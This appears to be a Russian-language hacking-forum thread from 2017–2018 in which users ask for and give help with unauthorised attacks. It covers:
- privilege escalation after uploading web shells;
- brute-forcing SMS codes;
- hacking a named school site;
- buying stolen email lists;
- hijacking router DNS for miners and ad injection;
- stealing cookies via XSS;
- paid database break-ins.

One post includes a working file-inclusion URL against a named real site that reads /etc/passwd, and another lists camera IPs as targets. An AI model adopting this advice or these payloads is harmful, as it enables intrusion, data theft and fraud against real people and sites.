искал хоть какие то пароли что бы кэрио выкл =(

Dr_Wile
05.05.2017, 22:21
Вечер добрый, у меня вопрос. Залил я пару шеллов в chroot окружение неких серваков, спасибо проге sqlmap и её разработчикам. Но насколько я знаю это не круто, когда ты заюзав одну прогу получил дно-права на серваке. Вопрос в следующем: как поднять свои права на этих самых серваках до root/Администратора (понимаю, что этот вопрос требует уточнения некоторых моментов, подскажите в какую сторону направить google паруса (юзал --os-shell)), и как используя чужие сплоиты и пайлоады (исходники имеется ввиду) можно получить некоторые права на сервере. Заранее спасибо.

P.S. Скачал пару троек журналов ][акер, в них описываются подобные взломы, надеюсь на то что не только этот журнал, но и античатлане помогут мне вырасти из скрипткидисовых колготок в тру-хацкерские джинсы XD

Octavian
08.05.2017, 14:56
Есть сайт при добавление проверенного номера телефона в обявлении на телефон отправляется 4 значный цифровой код, на подтверждение кодом дается минута насколько возможно сбрутить простыми ресурсами 10.000 вариантов / 60 сек?

Выходит 166 в секунду многовато?

lolidoli
13.05.2017, 02:40
↑ (https://antichat.live/posts/4081649/)
Есть сайт при добавление проверенного номера телефона в обявлении на телефон отправляется 4 значный цифровой код, на подтверждение кодом дается минута насколько возможно сбрутить простыми ресурсами 10.000 вариантов / 60 сек?
Выходит 166 в секунду многовато?


нет))

для начала берёшь трубку и юзаешь коды.. повторы бывают на 75%.. вот целый день коды половишь а потом уже и начинай брут

couldnot332
18.05.2017, 15:47
Приветик, я обнаружил на одном сайте сразу 3 уязвимости(SSRF,LFI,SQL injection), но не могу их эксплуатировать так как не знаю как)) Помогите пожалуйста!http://i.imgur.com/pikLl00.png

Alexandr17
08.10.2017, 16:01
Всем здарова! Прошу откликнутся знатоков этого форума, которые подсказали бы как експлуатировать эту уязвимость на сайте

Incorrect caching directives (higher risk). Проблема в директории сайта и риск повышенный. Понимаю, что не так всё просто, лёгких путей не ищу. SQL иньекции и т.д и т.п. Знаю что на данном форуме есть профи своего дела. Я прошу просто подсказки в каком направлении мне двигаться и какие программы для этой уязвимости использовать. Не исключено знание языков web программирования. Но именно их не изучал. Буду благодарен за ответ Всем кто откликнется

9vvv01
04.11.2017, 20:43
есть сотни сайтов выгружу сейчас только несколько для примера, на них люди проходят регестрацию с указанием своей почты или оставляют заявки так же с почтой, мне нужно узнать почты всех кто там оставлял заявки, возможно такое или нет?

https://eos.io/ https://www.mercuryprotocol.com/ https://adshares.net/ https://moldcoin.jp/index.html (https://moldcoin.jp/) https://www.hydrominer.org/

если возможно готов покупать эти базы за крипту или кэш...

хочу долгое продуктивное сотрудничество, сайтов сотни ..готов оплатить ве расходы

superstar119
21.11.2017, 17:35
Добрый день, хотелось бы взломать сайт своей бывшей школы я совсем новичок в этом деле, скажу только что, sql инъекция не прошла, а wordpress выдает ошибку хотя по инфе нарыл, что сайт на wordpress написан был, если за это не банят, то вот сайт http://www.leaderschool.kz/ модераторы не баньте, можете ссылку удалить)

artkar
21.11.2017, 18:03
wordpress достаточно надёжная промышленная цмс, так с коначка её его не подломить

Aleksandr081
25.11.2017, 18:05
Ответьте пожалуйста , почему у меня не запускается программа hashcat , компьютер выдаёт такую ошибку : http://i.piccy.info/i9/ca564b29741c54628805acffc6e91367/1511617809/146452/1199646/Hashcat.jpg

Может быть причина , в том что видеокарта не подходит , я проверил программой GPU-Z.1.12.0.exe , и вот скриншот с данными : http://i.piccy.info/i9/7073f4b562e39b26dbac9afb590735a8/1511618350/103519/1199646/Vydeokarta.jpg

Turanchocks_
25.11.2017, 18:08
↑ (https://antichat.live/posts/4153455/)
Ответьте пожалуйста , почему у меня не запускается программа hashcat , компьютер выдаёт такую ошибку :
http://i.piccy.info/i9/ca564b29741c54628805acffc6e91367/1511617809/146452/1199646/Hashcat.jpg
Может быть причина , в том что видеокарта не подходит , я проверил программой GPU-Z.1.12.0.exe , и вот скриншот с данными :
http://i.piccy.info/i9/7073f4b562e39b26dbac9afb590735a8/1511618350/103519/1199646/Vydeokarta.jpg


Подойдя к программам подобного толку, всё же надоть задуматься о никсах. Ну не ХР же, ёбен-бобен.

ProTreo
08.12.2017, 12:13
На удаленном серваке заблокирован доступ ко всем портам кроме 80 или 443. Есть ли возможность пробросить tty по 80 порту через веб-шелл ? (Попытки подрубится к/с сервака неудачны, т.к. iptables заблокировал весь остальной траффик). Веб-шелл работает не от рута, поэтому нету возможности заспавнить tty от рута чтобы очистить iptables.

Aleksandr081
07.01.2018, 13:49
Такая ситуация , здесь мне подобрали пароль к сети wi-fi , он естественно правильный и подошёл .

А у меня ни программа Elcomsoft.Wireless.Security.Auditor.Pro.v4.0.211.0-Lz0 , ни программа aircrack-ng-1-2-rc-2-en-win ничего не нашли , и это при том что в текстовом файле – словаре , правильный пароль есть . Но программы почему-то его не видят и не находят . Как такое может быть ?

Возможно здесь ребята используют намного более сложные программы для подбора пароля .

А мои сильно устарели .

Или в чём может быть причина ?

Как Вы считаете ?

Turanchocks_
07.01.2018, 13:58
↑ (https://antichat.live/posts/4170267/)
Или в чём может быть причина ?


Причина в win.Надо чтобы было nix

Aleksandr081
07.01.2018, 16:52
↑ (https://antichat.live/posts/4170269/)
Причина в win.Надо чтобы было nix


Всё оказалось сложнее , чем Вы предполагали , я выполнил Ваш совет , и проверил через BT5 . результат тот же : не найден , хотя пароль в словаре ! Смотрите вот скриншот из BT5 : http://i.piccy.info/i9/2bfe98549821c02108ecfd12d7fd7706/1515328858/107830/1210805/Screenshot.jpg

Так что похоже здесь на форуме используют намного более сложные программы !

Могу предоставить хендшейк и текстовый файл , если не верите моей проблеме . Возможно причина в хендшейке , и старые программы не помогают , я это глубоко не изучал , и поэтому не знаю .

juicybrute
22.01.2018, 01:30
Привет, помогите советом, есть целая куча сбрученных админок роутеров, но не могу придумать, что с ними сделать можно. Из мыслей которые приходили в голову подмена dns и встраивание майнера (но не могу найти детальной инфы на эту тему), подмена рекламы на страницах посещаемых юзером (но тут тоже дальше идеи не ушло). В общем багаж знаний скудноватый, не хватает его.

mazaxaka
24.01.2018, 14:59
↑ (https://antichat.live/posts/4175831/)
Привет, помогите советом, есть целая куча сбрученных админок роутеров, но не могу придумать, что с ними сделать можно. Из мыслей которые приходили в голову подмена dns и встраивание майнера (но не могу найти детальной инфы на эту тему), подмена рекламы на страницах посещаемых юзером (но тут тоже дальше идеи не ушло). В общем багаж знаний скудноватый, не хватает его.


майнер на роутере возможен только с перепрошивкой, и то не везде

juicybrute
25.01.2018, 16:18
↑ (https://antichat.live/posts/4176811/)
майнер на роутере возможен только с перепрошивкой, и то не везде


Спасибо, уже нашел решение интересное. оба с подменой dns, одно майнинг в браузере который не отрубается даже при закрытии вкладки, второе собственно подсовывание/подмена рекламы. Вопрос того насколько это вообще имеет в смысл в плане доходности. Проверю в ближ время...

example
27.01.2018, 07:54
Нужно взломать две бд на сайтах типо fake-scam и почистить пару тем. За каждый сайт платим 300 у.е. Ищем постоянных партнеров. Писать в телеграмм Unclesom

hei
06.03.2018, 21:37
Скажите пожалуйста,чем можно проверить веб-приложение на уязвимость?

BabaDook
06.03.2018, 21:54
↑ (https://antichat.live/posts/4190679/)
Скажите пожалуйста,чем можно проверить веб-приложение на уязвимость?


Браузером

erwerr2321
06.03.2018, 23:03
↑ (https://antichat.live/posts/4190679/)
Скажите пожалуйста,чем можно проверить веб-приложение на уязвимость?


curl' ом, burp' ом тоже можно попытаться...

erwerr2321
06.03.2018, 23:04
↑ (https://antichat.live/posts/4190689/)
Браузером


Да.


↑ (https://antichat.live/posts/4190679/)
Скажите пожалуйста,чем можно проверить веб-приложение на уязвимость?


curl' ом, burp' ом тоже можно попытаться...

hei
07.03.2018, 21:58
чтобы получить доступ к файлам куки жертвы,каким способом это можно сделать,нужна ли для этого программа?

BabaDook
08.03.2018, 00:57
↑ (https://antichat.live/posts/4191002/)
чтобы получить доступ к файлам куки жертвы,каким способом это можно сделать,нужна ли для этого программа?


Вариантом миллиард и больше. Задавайте точные вопросы, описывайте что есть, что хотите, как вы видите данную ситуацию.

ania01
23.04.2018, 09:19
Есть уязвимости на системы видео наблюдения?

http://185.54.238.144/

http://185.54.238.156/

http://185.54.238.157/

http://185.54.238.190/

karkajoi
24.04.2018, 16:45
↑ (https://antichat.live/posts/4204132/)
Есть уязвимости на системы видео наблюдения?
http://185.54.238.144/
http://185.54.238.156/
http://185.54.238.157/
http://185.54.238.190/


https://www.exploit-db.com

http://0day.today/

http://google.com/

Вперед

BabaDook
24.04.2018, 21:05
↑ (https://antichat.live/posts/4204132/)
Есть уязвимости на системы видео наблюдения?
http://185.54.238.144/
http://185.54.238.156/
http://185.54.238.157/
http://185.54.238.190/




↑ (https://antichat.live/posts/4204547/)
https://www.exploit-db.com
http://0day.today/
http://google.com/
Вперед


Это лучше

http://routerpwn.com/

Тот_самый_Щуп
07.05.2018, 03:07
Буду признателен, если поделитесь годными словарями для перебора директорий\файлов и так далее на сайте, под Dirbuster и аналогичный софт, стандартные словари слишком убогие.

BabaDook
07.05.2018, 13:21
↑ (https://antichat.live/posts/4207788/)
Буду признателен, если поделитесь годными словарями для перебора директорий\файлов и так далее на сайте, под Dirbuster и аналогичный софт, стандартные словари слишком убогие.


Фаз лист бума

Тот_самый_Щуп
08.05.2018, 01:35
↑ (https://antichat.live/posts/4207865/)
Фаз лист бума


Благодарю. Это считается самая топовая? Если может быть есть аналогичные, буду особенно признателен.

BabaDook
08.05.2018, 01:56
↑ (https://antichat.live/posts/4208015/)
Благодарю. Это считается самая топовая? Если может быть есть аналогичные, буду особенно признателен.


Я ее использую. Ещё биг словарь из дирба. Еще всякие админ листы,олд файлы. От бума типа универсальный

fenicks
13.05.2018, 09:20
Можно ли при наличии доступа к БД залить шелл в DLE?

Jerri
13.05.2018, 09:31
↑ (https://antichat.live/posts/4209303/)
Можно ли при наличии доступа к БД залить шелл в DLE?


dumpfile (https://mariadb.com/kb/en/library/select-into-dumpfile/)

fenicks
13.05.2018, 09:46
Спасибо, а вообще как проще все файлы сайта слить, этим способом или еще есть пути?Ведь, как я понимаю, если у меня есть БД, то есть и доступ в админку. Какой самый простой и быстрый путь?

BabaDook
14.05.2018, 01:29
↑ (https://antichat.live/posts/4209311/)
Спасибо, а вообще как проще все файлы сайта слить, этим способом или еще есть пути?Ведь, как я понимаю, если у меня есть БД, то есть и доступ в админку. Какой самый простой и быстрый путь?


Этим-это каким? Вам не совсем верно подсказали. Вы можите залить иди слить файлы при высоких правах. То есть наличие доступа к БД вам ничего не гарантирует, даже при высоких правах. Но,какой вопрос такой и ответ.

fenicks
14.05.2018, 08:14
↑ (https://antichat.live/posts/4209466/)
Этим-это каким? Вам не совсем верно подсказали. Вы можите залить иди слить файлы при высоких правах. То есть наличие доступа к БД вам ничего не гарантирует, даже при высоких правах. Но,какой вопрос такой и ответ.


А какой вопрос? Давайте по-другому спрошу. У меня есть доступ к БД, я бы хотел слить весь сайт. Из админки сайта этого сделать не получвается (DLE хорош), поэтому думаю в сторону шелла, но могу ошибаться, поэтому спрашиваю есть ли пути и какой проще?

BabaDook
14.05.2018, 20:11
↑ (https://antichat.live/posts/4209485/)
А какой вопрос? Давайте по-другому спрошу. У меня есть доступ к БД, я бы хотел слить весь сайт. Из админки сайта этого сделать не получвается (DLE хорош), поэтому думаю в сторону шелла, но могу ошибаться, поэтому спрашиваю есть ли пути и какой проще?


Вот, теперь слить- я так понял хотите файлы. Тут вам естественно проще через админку залить шелл, и уже потом сливать файлы.

holdik
17.05.2018, 12:47
Имеется XSS на сайте, alert работает, абсолютно все скрипты срабатываются, фильтра нет, но document.cookie отдает пустое значение. Готов заплатить деньги за консультацию.

Тот_самый_Щуп
18.05.2018, 17:27
↑ (https://antichat.live/posts/4210433/)
Имеется XSS на сайте, alert работает, абсолютно все скрипты срабатываются, фильтра нет, но document.cookie отдает пустое значение. Готов заплатить деньги за консультацию.


Так на сайте вы XSS нашли, или на левом поддомене всё же?

CyberTro1n
18.05.2018, 19:02
↑ (https://antichat.live/posts/4208018/)
Я ее использую. Ещё биг словарь из дирба. Еще всякие админ листы,олд файлы. От бума типа универсальный


Не юзал. Старый парс?

mindsmith
10.06.2018, 00:08
Есть паблик LFI, читает passwd, php.ini, group.Не конвертится традиционными методами (врапперы забанены или не отвечают, логи не отвечают, /proc/self/fd и environ не отвечают).

Смущает ответ сервера при разных запросах: на /var/log/apache2/access.log пустой ответ, при вызове любого wrapper-а нет ответа вовсе.Почему нет ответа и что я упускаю?

Пример: 123sardaigne.fr/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=/etc/passwd

BabaDook
10.06.2018, 00:14
↑ (https://antichat.live/posts/4216790/)
Есть паблик LFI, читает passwd, php.ini, group.Не конвертится традиционными методами (врапперы забанены или не отвечают, логи не отвечают, /proc/self/fd и environ не отвечают).
Смущает ответ сервера при разных запросах: на /var/log/apache2/access.log пустой ответ, при вызове любого wrapper-а нет ответа вовсе.Почему нет ответа и что я упускаю?
Пример: 123sardaigne.fr/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=/etc/passwd


Как вы при LFI можете читать есть врапперы забанены или не отвечают.

на /var/log/apache2/access.log пустой ответ может быть такое что нету доступа к файлу.

при вызове любого wrapper-а нет ответа вовсе - может быть ошибка скрипта, а может что-то ещё.

что я упускаю? тут очень сложно сказать.

mindsmith
10.06.2018, 00:27
Читать через include же.Это функция, не враппер.

На ошибку скрипта не похоже, таких на паблике слишком много набирается, на разных дырках.

Перефразирую: В какую сторону в таком случае посоветуете копать и какие блокировки на серваке могут вызвать такие симптомы?

BabaDook
10.06.2018, 00:43
↑ (https://antichat.live/posts/4216793/)
Читать через include же.Это функция, не враппер.
На ошибку скрипта не похоже, таких на паблике слишком много набирается, на разных дырках.
Перефразирую: В какую сторону в таком случае посоветуете копать и какие блокировки на серваке могут вызвать такие симптомы?


поглядите в сторону временных файлов, или файлов сессии. Или ищите где можно загрузить файл.

Pirnazar
26.06.2018, 15:04
Помогите найти exploit для Apache 2.2.16 (Debian)

Mumu
26.06.2018, 15:17
↑ (https://antichat.live/posts/4221247/)
Помогите найти exploit для Apache 2.2.16 (Debian)


здесь поищи: https://0day.today

Pirnazar
26.06.2018, 15:23
Там нету

AdWordsSeller
28.06.2018, 00:31
Все привет. Ищу людей, которые работали или работаю с рекламой в Baidu. Нужна помощь в настройке рекламы.

foozzione
05.07.2018, 20:23
phpmyadmin 4.8.0.1, на странице авторизации токен выглядит так - https://i.imgur.com/J9vms8e.png

в чем может быть проблема?